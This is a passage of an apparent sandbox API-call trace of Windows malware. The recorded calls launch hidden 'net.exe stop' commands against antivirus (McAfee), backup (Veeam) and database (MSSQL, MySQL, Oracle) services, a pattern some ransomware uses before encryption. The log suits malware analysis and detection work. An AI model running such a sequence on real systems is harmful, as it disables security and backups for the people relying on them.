(nStdHandle=0xfffffff4) returned 0x0 [0105.675] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.675] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.675] CoTaskMemFree (pv=0x741d20) [0105.675] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLServerADHelper100 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x240d110 | out: lpCommandLine="\"net.exe\" stop MSSQLServerADHelper100 /y", lpProcessInformation=0x240d110*(hProcess=0x404, hThread=0x3b4, dwProcessId=0xf6c, dwThreadId=0xf74)) returned 1 [0105.683] CloseHandle (hObject=0x448) returned 1 [0105.683] GetFileType (hFile=0x418) returned 0x3 [0105.683] CloseHandle (hObject=0x3b4) returned 1 [0105.683] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.684] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.684] GetCurrentProcess () returned 0xffffffff [0105.684] GetCurrentProcess () returned 0xffffffff [0105.684] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x438) returned 1 [0105.684] CloseHandle (hObject=0x3b4) returned 1 [0105.684] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.684] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.684] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.684] CoTaskMemFree (pv=0x741d20) [0105.684] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McAfeeFramework /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeac*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x24109d8 | out: lpCommandLine="\"net.exe\" stop McAfeeFramework /y", lpProcessInformation=0x24109d8*(hProcess=0x424, hThread=0x3b4, dwProcessId=0xee0, dwThreadId=0x158)) returned 1 [0105.691] CloseHandle (hObject=0x448) returned 1 [0105.692] GetFileType (hFile=0x438) returned 0x3 [0105.692] CloseHandle (hObject=0x3b4) returned 1 [0105.692] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.692] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.692] GetCurrentProcess () returned 0xffffffff [0105.692] GetCurrentProcess () returned 0xffffffff [0105.692] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x458) returned 1 [0105.692] CloseHandle (hObject=0x3b4) returned 1 [0105.692] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.692] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.692] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.692] CoTaskMemFree (pv=0x741d20) [0105.693] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamMountSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x241428c | out: lpCommandLine="\"net.exe\" stop VeeamMountSvc /y", lpProcessInformation=0x241428c*(hProcess=0x450, hThread=0x3b4, dwProcessId=0xf84, dwThreadId=0xb80)) returned 1 [0105.696] CloseHandle (hObject=0x448) returned 1 [0105.696] GetFileType (hFile=0x458) returned 0x3 [0105.696] CloseHandle (hObject=0x3b4) returned 1 [0105.697] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0105.697] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x3b4, hWritePipe=0x5a6ef64*=0x448) returned 1 [0105.697] GetCurrentProcess () returned 0xffffffff [0105.697] GetCurrentProcess () returned 0xffffffff [0105.697] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x3b4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x474) returned 1 [0105.697] CloseHandle (hObject=0x3b4) returned 1 [0105.697] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.697] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0105.697] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0105.697] CoTaskMemFree (pv=0x741d20) [0105.697] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MSSQLServerOLAPService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x448, hStdError=0x0), lpProcessInformation=0x2417b4c | out: lpCommandLine="\"net.exe\" stop MSSQLServerOLAPService /y", lpProcessInformation=0x2417b4c*(hProcess=0x460, hThread=0x3b4, dwProcessId=0xedc, dwThreadId=0xf80)) returned 1 [0106.311] CloseHandle (hObject=0x448) returned 1 [0106.316] GetFileType (hFile=0x474) returned 0x3 [0106.316] CloseHandle (hObject=0x3b4) returned 1 [0106.918] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0106.918] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x47c, hWritePipe=0x5a6ef64*=0x4e0) returned 1 [0106.918] GetCurrentProcess () returned 0xffffffff [0106.919] GetCurrentProcess () returned 0xffffffff [0106.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x47c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4dc) returned 1 [0106.919] CloseHandle (hObject=0x47c) returned 1 [0106.919] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.919] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0106.919] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0106.919] CoTaskMemFree (pv=0x741d20) [0106.919] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McAfeeFrameworkMcAfeeFramework /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6ee90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x4e0, hStdError=0x0), lpProcessInformation=0x241b970 | out: lpCommandLine="\"net.exe\" stop McAfeeFrameworkMcAfeeFramework /y", lpProcessInformation=0x241b970*(hProcess=0x4e4, hThread=0x47c, dwProcessId=0x10a4, dwThreadId=0x10a8)) returned 1 [0107.095] CloseHandle (hObject=0x4e0) returned 1 [0107.095] GetFileType (hFile=0x4dc) returned 0x3 [0107.095] CloseHandle (hObject=0x47c) returned 1 [0109.932] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0109.932] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0109.932] GetCurrentProcess () returned 0xffffffff [0109.932] GetCurrentProcess () returned 0xffffffff [0109.932] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x3f0) returned 1 [0109.932] CloseHandle (hObject=0x4f8) returned 1 [0109.933] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0109.933] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0109.933] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0109.933] CoTaskMemFree (pv=0x741d20) [0109.933] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamNFSSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x227205c | out: lpCommandLine="\"net.exe\" stop VeeamNFSSvc /y", lpProcessInformation=0x227205c*(hProcess=0x4a4, hThread=0x4f8, dwProcessId=0x1160, dwThreadId=0x1164)) returned 1 [0110.153] CloseHandle (hObject=0x3e0) returned 1 [0110.153] GetFileType (hFile=0x3f0) returned 0x3 [0110.154] CloseHandle (hObject=0x4f8) returned 1 [0111.694] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0111.694] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0111.694] GetCurrentProcess () returned 0xffffffff [0111.694] GetCurrentProcess () returned 0xffffffff [0111.694] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x414) returned 1 [0111.694] CloseHandle (hObject=0x4f8) returned 1 [0111.694] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0111.695] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0111.695] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0111.695] CoTaskMemFree (pv=0x741d20) [0111.695] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MySQL57 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24c5970 | out: lpCommandLine="\"net.exe\" stop MySQL57 /y", lpProcessInformation=0x24c5970*(hProcess=0x3f4, hThread=0x4f8, dwProcessId=0x11d8, dwThreadId=0x11dc)) returned 1 [0112.189] CloseHandle (hObject=0x3e0) returned 1 [0112.189] GetFileType (hFile=0x414) returned 0x3 [0112.189] CloseHandle (hObject=0x4f8) returned 1 [0112.611] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.611] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.611] GetCurrentProcess () returned 0xffffffff [0112.611] GetCurrentProcess () returned 0xffffffff [0112.611] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4c0) returned 1 [0112.611] CloseHandle (hObject=0x4f8) returned 1 [0112.611] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.612] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.612] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.612] CoTaskMemFree (pv=0x741d20) [0112.612] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McShield /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x24dae04 | out: lpCommandLine="\"net.exe\" stop McShield /y", lpProcessInformation=0x24dae04*(hProcess=0x4b8, hThread=0x4f8, dwProcessId=0x12c4, dwThreadId=0x12c8)) returned 1 [0112.621] CloseHandle (hObject=0x3e0) returned 1 [0112.621] GetFileType (hFile=0x4c0) returned 0x3 [0112.621] CloseHandle (hObject=0x4f8) returned 1 [0112.621] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.621] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.621] GetCurrentProcess () returned 0xffffffff [0112.621] GetCurrentProcess () returned 0xffffffff [0112.621] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4d0) returned 1 [0112.621] CloseHandle (hObject=0x4f8) returned 1 [0112.621] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.621] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.621] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.622] CoTaskMemFree (pv=0x741d20) [0112.622] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamRESTSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2531d18 | out: lpCommandLine="\"net.exe\" stop VeeamRESTSvc /y", lpProcessInformation=0x2531d18*(hProcess=0x4c8, hThread=0x4f8, dwProcessId=0x12d0, dwThreadId=0x12d4)) returned 1 [0112.631] CloseHandle (hObject=0x3e0) returned 1 [0112.631] GetFileType (hFile=0x4d0) returned 0x3 [0112.631] CloseHandle (hObject=0x4f8) returned 1 [0112.631] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.631] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.631] GetCurrentProcess () returned 0xffffffff [0112.631] GetCurrentProcess () returned 0xffffffff [0112.631] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x4dc) returned 1 [0112.631] CloseHandle (hObject=0x4f8) returned 1 [0112.632] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.632] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.632] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.632] CoTaskMemFree (pv=0x741d20) [0112.632] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop MySQL80 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x25355c8 | out: lpCommandLine="\"net.exe\" stop MySQL80 /y", lpProcessInformation=0x25355c8*(hProcess=0x4d8, hThread=0x4f8, dwProcessId=0x12dc, dwThreadId=0x12e0)) returned 1 [0112.640] CloseHandle (hObject=0x3e0) returned 1 [0112.640] GetFileType (hFile=0x4dc) returned 0x3 [0112.641] CloseHandle (hObject=0x4f8) returned 1 [0112.641] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.641] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.641] GetCurrentProcess () returned 0xffffffff [0112.641] GetCurrentProcess () returned 0xffffffff [0112.641] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x500) returned 1 [0112.641] CloseHandle (hObject=0x4f8) returned 1 [0112.641] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.641] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.641] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.641] CoTaskMemFree (pv=0x741d20) [0112.641] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McTaskManager /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eeb0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x2538e78 | out: lpCommandLine="\"net.exe\" stop McTaskManager /y", lpProcessInformation=0x2538e78*(hProcess=0x4ec, hThread=0x4f8, dwProcessId=0x12e8, dwThreadId=0x12ec)) returned 1 [0112.645] CloseHandle (hObject=0x3e0) returned 1 [0112.645] GetFileType (hFile=0x500) returned 0x3 [0112.646] CloseHandle (hObject=0x4f8) returned 1 [0112.646] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.646] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.646] GetCurrentProcess () returned 0xffffffff [0112.646] GetCurrentProcess () returned 0xffffffff [0112.646] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x504) returned 1 [0112.646] CloseHandle (hObject=0x4f8) returned 1 [0112.646] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.646] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.646] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.646] CoTaskMemFree (pv=0x741d20) [0112.646] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop VeeamTransportSvc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x253c730 | out: lpCommandLine="\"net.exe\" stop VeeamTransportSvc /y", lpProcessInformation=0x253c730*(hProcess=0x4fc, hThread=0x4f8, dwProcessId=0x12f0, dwThreadId=0x12f4)) returned 1 [0112.650] CloseHandle (hObject=0x3e0) returned 1 [0112.650] GetFileType (hFile=0x504) returned 0x3 [0112.650] CloseHandle (hObject=0x4f8) returned 1 [0112.650] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0112.650] CreatePipe (in: hReadPipe=0x5a6ef68, hWritePipe=0x5a6ef64, lpPipeAttributes=0x5a6eee8, nSize=0x0 | out: hReadPipe=0x5a6ef68*=0x4f8, hWritePipe=0x5a6ef64*=0x3e0) returned 1 [0112.651] GetCurrentProcess () returned 0xffffffff [0112.651] GetCurrentProcess () returned 0xffffffff [0112.651] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x4f8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x5a6ef6c, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x5a6ef6c*=0x50c) returned 1 [0112.651] CloseHandle (hObject=0x4f8) returned 1 [0112.651] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0112.651] CoTaskMemAlloc (cb=0x20e) returned 0x741d20 [0112.651] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x741d20 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0112.651] CoTaskMemFree (pv=0x741d20) [0112.651] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop OracleClientCache80 /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x5a6eea4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x3e0, hStdError=0x0), lpProcessInformation=0x253fff4 | out: lpCommandLine="\"net.exe\" stop OracleClientCache80 /y", lpProcessInformation=0x253fff4*(hProcess=0x508, hThread=0x4f8, dwProcessId=0x12f8, dwThreadId=0x12fc)) returned 1 [0112.655] CloseHandle (hObject=0x3e0) returned 1 [0112.655] GetFileType (hFile=0x50c) returned 0x3 [0112.655] CloseHandle (hObject=0x4f8) returned 1 [0112.656] GetStdHandle 